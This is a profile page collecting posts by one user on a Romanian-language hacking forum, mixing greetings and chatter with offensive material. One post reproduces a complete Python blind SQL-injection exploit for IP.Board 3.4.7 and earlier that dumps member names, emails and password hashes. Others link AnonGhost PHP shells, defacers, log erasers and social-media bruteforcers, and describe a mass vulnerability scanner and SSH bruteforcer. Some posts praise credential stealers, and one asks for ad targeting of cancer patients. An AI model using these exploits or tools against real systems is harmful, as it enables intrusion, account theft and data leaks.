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Everything posted by mp4

  1. Salut, vreau sa promovez un website, ce contine un singur produs, un medicament, destul de scump. As vrea sa stiu daca ma poate ajuta cineva contracost cu metode noi de promovare. Daca se poate sa fie selectat ca si target persoanele bonlave de cancer. World Wide, in special pentru Romania, Moldova, Bulgaria... vecinii nostrii in general. Multumesc.
  2. Site oficial: http://www.grab-m.com Download Free Version: http://grab-m.com/download/setup.exe M-am chinuit o luna la programelul asta eu si inca un coleg. Sper sa va placa. Daca nu returneaza prea multe in simple search incercati un query gen: yahoo.com
  3. Features: BETA 1 is released! Requirements: Java 8 (for now) Do not click here.
  4. Intro Data grabbing: URL's (geturl/massurl) -> (scan) Configs, Databases, SQLi's (dork) Full Path Disclosures / Users (fpds) -> (brutefpds) Top websites info (top) Massive scanning XSS, SQLi, LFI, RFI (scan) FTP, SSH, DB's, IMAP (multibruter) Accurate SSH bruteforce (brutefpds) Plan Web Apps Grab url's via 'geturl' or 'massurl' (massurl requires list of tags as file) Scan url's parameters for vulns with 'scan' Servers Pick target, get ip range Scan for services on each IP and bruteforce with 'multibruter' Grab full path disclosures, and so linux usernames Perform SSH bruteforce for specific user with 'brutefpds' Info grabbing Use 'dork' for automatic dorking Use 'fpds' for full path disclosure grabbing Use 'search' for searching someone in ur databases Use 'top' for scanning all top websites of specific nation Others 'Stat' shows actual statistics and informations 'Show' display specific file 'Clear' and 'filter' - remove duplicates, remove blacklisted url's Others MultiBrtuer requirements (php5): php5-mysql - for mysql connections php5-pgsql - for postgresql connections libssh2-php - for ssh connections php5-sybase - for mssql connections php5-imap - for imap connections TODO: Fix problems with grabbing large amount of url's More search engines SQL Injector RFI shell uploader FSU is not secure as it should be Download ba.
  5. [+] AnonGhost Auto SQLi Query Maker [+] https://ghostbin.com/paste/hd26gkco [+] Facebook XMPP Chat Protocol Bruteforce [+] https://ghostbin.com/paste/oynf9bt2 [+] Facebook Brute Reset Codel [+] https://ghostbin.com/paste/e5te5umj [+] Ftp Brute Force [+] https://ghostbin.com/paste/3sxovcuh/edit [+] Facebook Pentester [+] https://ghostbin.com/paste/qyns3ox7 [+] Twitter Brute Force [+] https://ghostbin.com/paste/nubyt3vh Password = ./d3f4ult_v1rUsa
  6. [+] AnonGhost PHP Shell [+] https://ghostbin.com/paste/9ckp3dst [+] Bypass Root Path With Zip File [+] https://ghostbin.com/paste/tdbvr2ug [+] Bypass Forbidden with Python via TCP Protocol [+] https://ghostbin.com/paste/qbrs9r8a [+] Wordpress 0day CSRF + Brute Token [+] https://ghostbin.com/paste/znxkcojv [+] Wordpress Index Hijack [+] https://ghostbin.com/paste/8wf2yj2v [+] CPanel & FTP Auto Defacer [+] https://ghostbin.com/paste/z6jfwrbm [+] Reverse IP Lookup [+] https://ghostbin.com/paste/kaa5na3x [+] Logs Eraser [+] https://ghostbin.com/paste/w9puv3kq [+] Facebook Multi-Account Bruteforce [+] https://ghostbin.com/paste/akn9adf8 [+] Bypass SafeMode [+] https://ghostbin.com/paste/j423dffz [+] Skype BruteForce [+] https://ghostbin.com/paste/r85xqq28 [+] Virtual Bypass Via Error_Log [+] https://ghostbin.com/paste/qjb2shhu [+] Shtml Bypass Symlink Via Error [+] https://ghostbin.com/paste/orqjsu6e [+] Bypass Users Server [+] https://ghostbin.com/paste/koew333z [+] Cpanel Mass Defacer [+] https://ghostbin.com/paste/nt3zc43b [+] Bypass Chmod Directory [+] https://ghostbin.com/paste/2q6vjea3 [+] Bypass Root Path [+] https://ghostbin.com/paste/y8jx2hfs [+] Wordpress Add Admin User [+] https://ghostbin.com/paste/ffqvakw8 [+] Server Informations [+] https://ghostbin.com/paste/om32c59z [+] Twitter Multi-Account Brute force [+] https://ghostbin.com/paste/hsmbtep8 [+] Symlink Bypass [+] https://ghostbin.com/paste/ywv75o46 [+] Bypass /etc/passwd [+] https://ghostbin.com/paste/6nuom97j Password: ./d3f4ult_v1rUsa
  7. #!/usr/bin/env python # Sunday, November 09, 2014 - secthrowaway@safe-mail.net # IP.Board <= 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable # Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs print '\n\n---------------------------------------------------------------------------------' print 'Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs' print '---------Script has been modified for different table prefix XXX_members---------' print '---------------------------------------------------------------------------------\n\n\n' url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ') url = url.rstrip('/') ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" import sys, re import urllib2, urllib def inject(sql): try: urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e: if e.code == 503: data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE) if txt is not None: return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli)) if s < 31: return inject(sqli) else: r = '' for i in range(1, s+1, 31): r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31)) return r members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1') n = inject('SELECT COUNT(*) FROM %s' % members_table) print '----------------------------------------------------------------------------' print '* Found %s users' % n print '----------------------------------------------------------------------------' for j in range(int(n)): print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j)) print '{:20s} {:20s}'.format('Name',get('name', members_table, j)) print '{:20s} {:20s}'.format('Email',get('email', members_table, j)) print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j)) print '----------------------------------------------------------------------------' Video: https://vimeo.com/111863081 Credit: Makman
  8. mp4


    Cum obtii rank de V.I.P? sau Ce conditii trebuiesc indeplinite?
  9. mp4


    Ce iti mai place death note. Welcome.
  10. mp4


    Salut Bogdan, bine ai venit.
  11. Cand eram pe la jumatate cu design la platforma IPB de pe hellsoft. Mi-sa propus sa ii trag in teapa si sa dau baza de date completa pentru moderator sau admin pe ISR. Voi ce ati fi facut?
  12. Un loc unde gasesti stealere ca sa furi conturi la situri premuim porno. Must be the Heaven.
  13. Chiar VIP. Era goana aia dupa SMS BOMBER sau ceva de genu. Varsatoooor.
  14. Cine altcineva ar folosi un astfel de nickname. E mai rau decat tinkode.
  15. Salut sunt Dan. a.k.a: mp4... Am asteptat inca din 2008 sa invat sa ma prezint si in sfarsit am reusit. Ma bucur ca sunt aici inca din 2008 si imi place cum a evoluat comunitatea. Mult respect pentru integritate si devotamentul administratorilor dar si userilor care se straduiesc sa mentina aceasta comunitate pe picioare. Salutare tuturor.
  16. Am avut si eu aceiasi problema. Incearca cu alta sursa. (Eu am schimbat sursa si am cumparat si un UPS ca am tensiunea slaba)
  17. mp4

    ahoi marinar

  18. Am ajuns si eu la level 49... Are un bug aici astept sa rezolve .
  19. Tu ai Scary Death,Remote Dekstop, Flip Screen,Port scanner,Lista impartita in 2 Si sa fim sincer te-am facut de 2 ori la design.. Tu te uiti la programele tale inainte sa le postezi? Arata de zici ca leai facut cu ochii inchisi. Si din cate imi dau seama tu mananci programare pe paine si o scoti dupa cateva ore la wc.
  20. Scz dar facusem dinainte sa imi zici tu... E simplu rau de tot... CLIENT: Faci un alt forum Adaugam 2 ClientSocket 1 pentru titlu 2 Pentru text Alegi cate un port pentru fiecare. Mai adaugam de 2 ori edit Edit1-->Titlu Edit2-->Text Adaugam Si 5 RatioButtons Adaugam Un Button (Simplu) Introducem acest cod pe Form, events, OnActivate: Acum luam la rand RatioButtons.. Sa presupunem ca avem deja un ClientSocket1 pe forumul principal... Si un Edit1 pentru adresa ip. Revenim.. Pe buton,Events, OnClick Pe server pui : edit1 edit2 Serversocket2(Deoarece exista deja unul) ServerSocket3 Pe socket1 onclientread: pui edit1.text := SocketReceivetext; Pe socket2 onclientread pui edit2.text :=SocketReceiveText; Si acum e simplu daca faci cu codul ala de la tine cu mesaje intrun mod mai simplu.. Faci asa Pe ServerSocket1 care e serverul principal.. La onClientRead: Tutorial facut 100% De mine.. Daca apar errori postati aici deoarece codurile sunt scrise pe direct.. Nu uitati ca sa mearga va trebuie asta BY c0smyn: Puneti acest cod sub " {$R *.dfm} " PE Server.. Code: Uite ce am facut ... Asta e ordinea de inceput: 1: Parola: 2:Loading: 3:MainProgram: 4:A few Options: 5:About:
  21. Stii.. un Msg Sender complex..cu Error Info Asking ..etc:D?
  22. Sa stii ca nici macar nu apare.... Pur si simplu, nici macar un frame... E mai bun asa, deoarece firewallul ii permite serverului sa ruleze, nu dezactiveaza firewall.. Daca victima reactiveaza firewall gata sevrer..
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